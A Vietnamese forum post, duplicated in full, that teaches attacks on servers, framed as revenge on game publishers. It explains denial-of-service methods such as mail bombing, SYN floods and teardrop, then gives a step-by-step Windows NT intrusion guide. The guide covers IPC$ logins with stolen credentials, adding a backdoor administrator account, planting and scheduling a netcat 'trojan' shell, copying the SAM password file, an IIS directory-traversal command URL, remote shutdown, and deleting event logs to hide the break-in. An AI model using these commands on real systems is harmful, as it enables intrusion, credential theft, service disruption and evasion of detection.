baby_cuncha
22-04-2008, 06:20 AM
KHUYẾN CÁO:TÁC GIẢ BÀI VIẾT POST LÊN ĐỂ MỌI NGƯỜI HỌC TẬP ,KHÔNG CÓ Ý ĐỊNH DẠY CÁC BẠN TRỞ THÀNH HACKER(ÀH WEN,MÌNH CŨNG LƯU Ý CÁC BẠN ĐỪNG NÊN TẤN CÔNG 2T KẺO BỊ BAND NICK)
TẤN CÔNG SEVER.(DÀNH CHO AI CHƠI GAME ONLINE GHÉT NHÀ PHÁT HÀNH GAME)
Dos là gi?
Deny of Attcack, tấn công từ chối dịch vụ (DOS), đây là những điểm cơ bản nhất về tấn công từ chối dịch vụ.
Có 2 cách để tấn công từ chối dịch vụ là kiểu lame (tạm dịch là kiểu dành cho những kẻ trình độ thấp) và elite (cách thức tiên tiến):
Kiểu lame
Bom thư- là kĩ thuật làm cho hòm thư của người khác bị lụt bởi các bức thư, đây là một trong những dạng thấp nhất của DOS. Mọi người đều có thể lên mạng để kiếm vài chương trình boom thư như UNA hoặc KABOOOM , điền hòm thư của nạn nhân và … gửi thư. Hòm thư của nạn nhân sẽ đầy ắp thư hoặc có 1 cách đơn giản hơn đó là đăng kí địa chỉ của hắn với một site sex, hòm thư của hắn sẽ bị boom mà bạn chẳng cần phải làm gì cả.
Nếu như nạn nhân là admin của một site nào đó thì bằng cách boom thư bạn đã tiêu tốn một lượng lớn không gian đĩa cứng của hắn.
Đăng nhập liên tiếp: giả sử một mail server cho phép bạn đăng nhập một số ít lần và bạn biết tên đăng nhập của hắn, bạn có thể dùng một chương trình để đăng nhập liên tiếp, khi đó nạn nhân sẽ không thể đăng nhập vào hòm thư, như vậy là bạn đã khoá đường vào của hắn.
Bây giờ thì sẽ là những cách tiên tiến hơn nhưng cũng đòi hỏi ở bạn trình độ và sự thông minh của bạn
Tràn Syn
Đây là cách tấn công vào phương thức bắt tay của TCP/IP
Trước tiên chúng ta hãy tìm hiểu một chút về TCP/IP
Cách bình thường:-
Syn-packet được gửi tới máy chủ bởi máy khách có ý định thiết lập kết nối
SYN
Máy khách --------------> Máy chủ
Ở bước thứ 2 máy chủ sẽ trả lời với một gói SYN/Ack tới máy khách
SYN/ACK
Máy khách <-------------- Máy chủ
Bước thứ 3 và là bước cuối cùng.
Máy khách trả lời bằng một gói ack tới máy chủ và cơ chế bắt tay ba bước được hoàn thành
Bây giờ đến phần tấn công
Nhiều Syn-packet được gửi tới máy chủ thông qua một địa chỉ IP giả (địa chỉ IP chết hoặc không có), sau đó điều gì xảy ra, máy chủ sẽ trả lời với gói syn/ack và máy chủ đợi gói ack xác nhận. Nhưng vì địa chỉ IP không tồn tại nên nó vẫn phải chờ đợi, do vậy nó trì hoãn và tiêu tốn tài nguyên của hệ thống và làm cho hệ thống bị treo hoặc khởi động lại.
Land attack
Tấn công kiểu land attack cũng giống như tấn công kiểu tràn Syn nhưng thay bởi địa chỉ IP giả mạo hoặc chết thì nó sử dụng chính ngay IP của mục tiêu. Nó tạo ra một vong lặp vô tận và hệ thống đích bị phá vỡ. Nhưng hầu hết hệ thộng đều được thiết lập để chống lại kiểu tấn công này.
Smurf Attack
Là một dạng tấn công kiểu brute force (hàng loạt), trong đó một số lượng khổng lồ các router (định tuyến) sử dụng địa chỉ IP giả từ bên trong mạng đích, do đó khi nó nhận tín hiệu ping (thăm dò) nó sẽ phản hồi và làm lụt mạng. Và làm ngưng trệ giao thông mạng.
Lụt Udp
Đây là dạng tấn công 2 hệ thống đích và có thể sử dụng để ngừng các dịch vụ của 2 hệ thống. Cả 2 hệ thống được kết nối tới nhau, một tạo ra một chuỗi các kí tự cho mỗi gói nhận, theo cách nói khác là tạo ra các kí tự yêu cầu UDP trong khi đó hệ thống còn lại sẽ phản xạ lại mọi thông điệp mà nó nhận được. Do vậy tạo nên một vòng lặp vô hạn giữa 2 hệ thống, mọi dịch vụ khác giữa chúng bị tê liệt.
Ping of death
Kiểu tấn công này sẽ không làm việc được đối với các máy chủ đã được thiết lập để phòng ngừa nó. Trong kiểu tấn công này hệ thống đích được thăm dò bởi một gói vượt quá kích thước bình thường cho phép bởi giao thức tcp/ip và sẽ làm cho hệ thống đích bị treo hoặc khởi động lại
Tear Drop
Khi dữ liệu được gửi từ một hệ thống tới hệ thống khác nó được chia ra thành những mảnh nhỏ hơn và được máy đích tập hợp lại. Các gói này có một trường offset trong phần đầu của gói TCP là phần qui định phần dữ liệu nào được gửi đi. Nó kết hợp với số chuỗi, giúp cho máy đích có thể tập hợp các gói lại.
Trong phương thức tear drop các gói được chuyển đi với trường offfset chồng chéo, khiến cho máy nhận không thể ráp chúng lại và dẫn tới bị phá vỡ.
Có một kiểu tấn công mới gọi là DDOS trong đó nhiều máy tính được sử dụng để tấn công từ chối dịch vụ.
Tuy nhiên đây đều là những cách tấn công khá căn bản và các máy chủ bây giờ đều được trang bị để phòng chống mấy cái này . Cao hơn nữa là DDOS (Distributed DOS ) và DRDOS (Distributed Reflection DOS) . 2 thằng này chủ yếu tấn công qua giao thức TCP/IP cổng 80 hoặc UDP cổng 80 .Ở DDOS thì có một cái nữa là Zombie Code , nó giống như một dạng Client/Server progam . Zombie Client được cài trên một máy con tốc độ truy cập Internet lớn , còn Zombie Server sẽ chỉ ra khi nào được tấn công và tấn công cái gì . DRDOS là một phương thức cải tiến của kiểu tấn công SYN/ACK , cũng gửi hàng ngàn gói SYN tới router. Router lấy thông tin từ các gói và gửi lại gói SYN/ACK tới IP nạn nhân .Những người am hiểu và có khả năng tấn công bằng những cái này thực sự không nhiều , mà nhiều là những người sử dụng các chương trình viết sẵn để tấn công thôi.
Trở về đầu trang
Các lệnh cơ bản để xâm nhập máy tính
Phần 1 : Net
chỉ cần bố cháu có được User và Passwords của một IP nào trên Net...thế là bố cháu có thể kết nói một IPC$ rồi đấy....bây giờ tui xin ví dụ là bác có được User la hbx và passwords : 123456...IP : 127.0.0.1
Hãy mở trình Ms dos và gõ vào lệnh sau :
Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một IPC$ với máy victtim
nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dũng
-----------------------------------------------------------------------------------------------
bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới ...
chúng ta cộng thệm môt user mới là heibai và password lovechina
Net user heibai lovechina / add
nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator
Net Localgroup Adminstrator heibai / add
----------------------------------------------------------------------------------------------------
trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer
Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )
Z là của mình...còn C$ là của Victim
-------------------------------------------------------------------------------------------------------
Phần 2 : AT
thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi copy trojan lên máy rồi...làm thế nào dể khới động nó đây ?
chúng ta phải dùng đến lệnh AT thôi.....
đầu tiên...chúng ta cần biết thời gian của đối phương
Net time \\127.0.0.1
bây giờ thì nó sẽ phản hồi thời gian của victim...vd : 12:0 ..
tiếp theo..chúng ta cần tạo môt homework ID = 1
AT \\127.0.0.1 12:3 nc.exe
ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi
* giới thiệu chút it về NC...NC là từ viết tắc của NETCAT....nó là một telnet server với port 99
đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút
---------------------------------------------------------------------------------------------------------
phần 3 : Telnet
đây là một lệnh rất cần thiết khi xâm nhập máy tính...nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok
Telnet 127.0.0.1 99
thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh...
-----------------------------------------------------------------------------------------------------------
Phần 4 : Copy
bây giờ chúng ta nói tiêp...làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại....nhưng bạn phải có kết nối IPC$ cái đã....
chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNt
Copy index.html \\127.0.0.1\admin$\index.html
muốn copy files trên máy victm thì bạn gõ vào :
Copy \\127.0.0.1\Admin$\repair\sam._c:\
------------------------------------------------------------------------------------------------
phần 5 : Set
nếu bạn muốn hack một website......tất nhiến là phải mở port 80..nếu không thì hack cho ai xem ?
đã tới lúc dùng lệnh Set rồi
sau đây là kết quả mà tớ tìm thấy......chúng ta phân tích nghe....chủ yếu là muốn biêt homepage nó ở đâu thôi.....
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`.....
---------------------------------------------------------------------------------------
phần 6 : Nbtstat
nếu cậu Scan đuợc một máy sữ dụng Winnt...open port 135-139...thế thì bồ phải dùng lệnh này để biết thêm user thôi...
* tiện thể xin nói luôn...đây là netbios....sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi
Nbtstat - A XXX.XXX.XXX.XXX
sau đây là kết quả tớ scan được.....
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
kết quả cho biết User là PENTIUMII。
-------------------------------------------------------------------------------------------
phần 7 : Shutdown
nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt
Shutdown \\127.0.0.1 t:20
20 giây sau...Winnt sẽ tự khời động lại.......hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker có đạo đức
---------------------------------------------------------------------------------------------------------------------------------
phần 8 : Dir....
lệnh này không có gì để nói hết..chỉ dùng để view thôi.................
-----------------------------------------------------------------------------------------------
phần 9 : Del
lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm cổ hả ?
sau đây là những files nhật ký của Winnt
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
chỉ cần del hết là coi như xong.
Phần 2:ai có nhu cầu mình sẽ post tiếp.:2T-khicon-(105)::2T-khicon-(105):
(baby_cuncha tổng hợp)
TẤN CÔNG SEVER.(DÀNH CHO AI CHƠI GAME ONLINE GHÉT NHÀ PHÁT HÀNH GAME)
Dos là gi?
Deny of Attcack, tấn công từ chối dịch vụ (DOS), đây là những điểm cơ bản nhất về tấn công từ chối dịch vụ.
Có 2 cách để tấn công từ chối dịch vụ là kiểu lame (tạm dịch là kiểu dành cho những kẻ trình độ thấp) và elite (cách thức tiên tiến):
Kiểu lame
Bom thư- là kĩ thuật làm cho hòm thư của người khác bị lụt bởi các bức thư, đây là một trong những dạng thấp nhất của DOS. Mọi người đều có thể lên mạng để kiếm vài chương trình boom thư như UNA hoặc KABOOOM , điền hòm thư của nạn nhân và … gửi thư. Hòm thư của nạn nhân sẽ đầy ắp thư hoặc có 1 cách đơn giản hơn đó là đăng kí địa chỉ của hắn với một site sex, hòm thư của hắn sẽ bị boom mà bạn chẳng cần phải làm gì cả.
Nếu như nạn nhân là admin của một site nào đó thì bằng cách boom thư bạn đã tiêu tốn một lượng lớn không gian đĩa cứng của hắn.
Đăng nhập liên tiếp: giả sử một mail server cho phép bạn đăng nhập một số ít lần và bạn biết tên đăng nhập của hắn, bạn có thể dùng một chương trình để đăng nhập liên tiếp, khi đó nạn nhân sẽ không thể đăng nhập vào hòm thư, như vậy là bạn đã khoá đường vào của hắn.
Bây giờ thì sẽ là những cách tiên tiến hơn nhưng cũng đòi hỏi ở bạn trình độ và sự thông minh của bạn
Tràn Syn
Đây là cách tấn công vào phương thức bắt tay của TCP/IP
Trước tiên chúng ta hãy tìm hiểu một chút về TCP/IP
Cách bình thường:-
Syn-packet được gửi tới máy chủ bởi máy khách có ý định thiết lập kết nối
SYN
Máy khách --------------> Máy chủ
Ở bước thứ 2 máy chủ sẽ trả lời với một gói SYN/Ack tới máy khách
SYN/ACK
Máy khách <-------------- Máy chủ
Bước thứ 3 và là bước cuối cùng.
Máy khách trả lời bằng một gói ack tới máy chủ và cơ chế bắt tay ba bước được hoàn thành
Bây giờ đến phần tấn công
Nhiều Syn-packet được gửi tới máy chủ thông qua một địa chỉ IP giả (địa chỉ IP chết hoặc không có), sau đó điều gì xảy ra, máy chủ sẽ trả lời với gói syn/ack và máy chủ đợi gói ack xác nhận. Nhưng vì địa chỉ IP không tồn tại nên nó vẫn phải chờ đợi, do vậy nó trì hoãn và tiêu tốn tài nguyên của hệ thống và làm cho hệ thống bị treo hoặc khởi động lại.
Land attack
Tấn công kiểu land attack cũng giống như tấn công kiểu tràn Syn nhưng thay bởi địa chỉ IP giả mạo hoặc chết thì nó sử dụng chính ngay IP của mục tiêu. Nó tạo ra một vong lặp vô tận và hệ thống đích bị phá vỡ. Nhưng hầu hết hệ thộng đều được thiết lập để chống lại kiểu tấn công này.
Smurf Attack
Là một dạng tấn công kiểu brute force (hàng loạt), trong đó một số lượng khổng lồ các router (định tuyến) sử dụng địa chỉ IP giả từ bên trong mạng đích, do đó khi nó nhận tín hiệu ping (thăm dò) nó sẽ phản hồi và làm lụt mạng. Và làm ngưng trệ giao thông mạng.
Lụt Udp
Đây là dạng tấn công 2 hệ thống đích và có thể sử dụng để ngừng các dịch vụ của 2 hệ thống. Cả 2 hệ thống được kết nối tới nhau, một tạo ra một chuỗi các kí tự cho mỗi gói nhận, theo cách nói khác là tạo ra các kí tự yêu cầu UDP trong khi đó hệ thống còn lại sẽ phản xạ lại mọi thông điệp mà nó nhận được. Do vậy tạo nên một vòng lặp vô hạn giữa 2 hệ thống, mọi dịch vụ khác giữa chúng bị tê liệt.
Ping of death
Kiểu tấn công này sẽ không làm việc được đối với các máy chủ đã được thiết lập để phòng ngừa nó. Trong kiểu tấn công này hệ thống đích được thăm dò bởi một gói vượt quá kích thước bình thường cho phép bởi giao thức tcp/ip và sẽ làm cho hệ thống đích bị treo hoặc khởi động lại
Tear Drop
Khi dữ liệu được gửi từ một hệ thống tới hệ thống khác nó được chia ra thành những mảnh nhỏ hơn và được máy đích tập hợp lại. Các gói này có một trường offset trong phần đầu của gói TCP là phần qui định phần dữ liệu nào được gửi đi. Nó kết hợp với số chuỗi, giúp cho máy đích có thể tập hợp các gói lại.
Trong phương thức tear drop các gói được chuyển đi với trường offfset chồng chéo, khiến cho máy nhận không thể ráp chúng lại và dẫn tới bị phá vỡ.
Có một kiểu tấn công mới gọi là DDOS trong đó nhiều máy tính được sử dụng để tấn công từ chối dịch vụ.
Tuy nhiên đây đều là những cách tấn công khá căn bản và các máy chủ bây giờ đều được trang bị để phòng chống mấy cái này . Cao hơn nữa là DDOS (Distributed DOS ) và DRDOS (Distributed Reflection DOS) . 2 thằng này chủ yếu tấn công qua giao thức TCP/IP cổng 80 hoặc UDP cổng 80 .Ở DDOS thì có một cái nữa là Zombie Code , nó giống như một dạng Client/Server progam . Zombie Client được cài trên một máy con tốc độ truy cập Internet lớn , còn Zombie Server sẽ chỉ ra khi nào được tấn công và tấn công cái gì . DRDOS là một phương thức cải tiến của kiểu tấn công SYN/ACK , cũng gửi hàng ngàn gói SYN tới router. Router lấy thông tin từ các gói và gửi lại gói SYN/ACK tới IP nạn nhân .Những người am hiểu và có khả năng tấn công bằng những cái này thực sự không nhiều , mà nhiều là những người sử dụng các chương trình viết sẵn để tấn công thôi.
Trở về đầu trang
Các lệnh cơ bản để xâm nhập máy tính
Phần 1 : Net
chỉ cần bố cháu có được User và Passwords của một IP nào trên Net...thế là bố cháu có thể kết nói một IPC$ rồi đấy....bây giờ tui xin ví dụ là bác có được User la hbx và passwords : 123456...IP : 127.0.0.1
Hãy mở trình Ms dos và gõ vào lệnh sau :
Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một IPC$ với máy victtim
nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dũng
-----------------------------------------------------------------------------------------------
bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới ...
chúng ta cộng thệm môt user mới là heibai và password lovechina
Net user heibai lovechina / add
nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator
Net Localgroup Adminstrator heibai / add
----------------------------------------------------------------------------------------------------
trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer
Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )
Z là của mình...còn C$ là của Victim
-------------------------------------------------------------------------------------------------------
Phần 2 : AT
thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi copy trojan lên máy rồi...làm thế nào dể khới động nó đây ?
chúng ta phải dùng đến lệnh AT thôi.....
đầu tiên...chúng ta cần biết thời gian của đối phương
Net time \\127.0.0.1
bây giờ thì nó sẽ phản hồi thời gian của victim...vd : 12:0 ..
tiếp theo..chúng ta cần tạo môt homework ID = 1
AT \\127.0.0.1 12:3 nc.exe
ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi
* giới thiệu chút it về NC...NC là từ viết tắc của NETCAT....nó là một telnet server với port 99
đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút
---------------------------------------------------------------------------------------------------------
phần 3 : Telnet
đây là một lệnh rất cần thiết khi xâm nhập máy tính...nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok
Telnet 127.0.0.1 99
thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh...
-----------------------------------------------------------------------------------------------------------
Phần 4 : Copy
bây giờ chúng ta nói tiêp...làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại....nhưng bạn phải có kết nối IPC$ cái đã....
chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNt
Copy index.html \\127.0.0.1\admin$\index.html
muốn copy files trên máy victm thì bạn gõ vào :
Copy \\127.0.0.1\Admin$\repair\sam._c:\
------------------------------------------------------------------------------------------------
phần 5 : Set
nếu bạn muốn hack một website......tất nhiến là phải mở port 80..nếu không thì hack cho ai xem ?
đã tới lúc dùng lệnh Set rồi
sau đây là kết quả mà tớ tìm thấy......chúng ta phân tích nghe....chủ yếu là muốn biêt homepage nó ở đâu thôi.....
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`.....
---------------------------------------------------------------------------------------
phần 6 : Nbtstat
nếu cậu Scan đuợc một máy sữ dụng Winnt...open port 135-139...thế thì bồ phải dùng lệnh này để biết thêm user thôi...
* tiện thể xin nói luôn...đây là netbios....sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi
Nbtstat - A XXX.XXX.XXX.XXX
sau đây là kết quả tớ scan được.....
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
kết quả cho biết User là PENTIUMII。
-------------------------------------------------------------------------------------------
phần 7 : Shutdown
nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt
Shutdown \\127.0.0.1 t:20
20 giây sau...Winnt sẽ tự khời động lại.......hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker có đạo đức
---------------------------------------------------------------------------------------------------------------------------------
phần 8 : Dir....
lệnh này không có gì để nói hết..chỉ dùng để view thôi.................
-----------------------------------------------------------------------------------------------
phần 9 : Del
lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm cổ hả ?
sau đây là những files nhật ký của Winnt
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
chỉ cần del hết là coi như xong.
Phần 2:ai có nhu cầu mình sẽ post tiếp.:2T-khicon-(105)::2T-khicon-(105):
(baby_cuncha tổng hợp)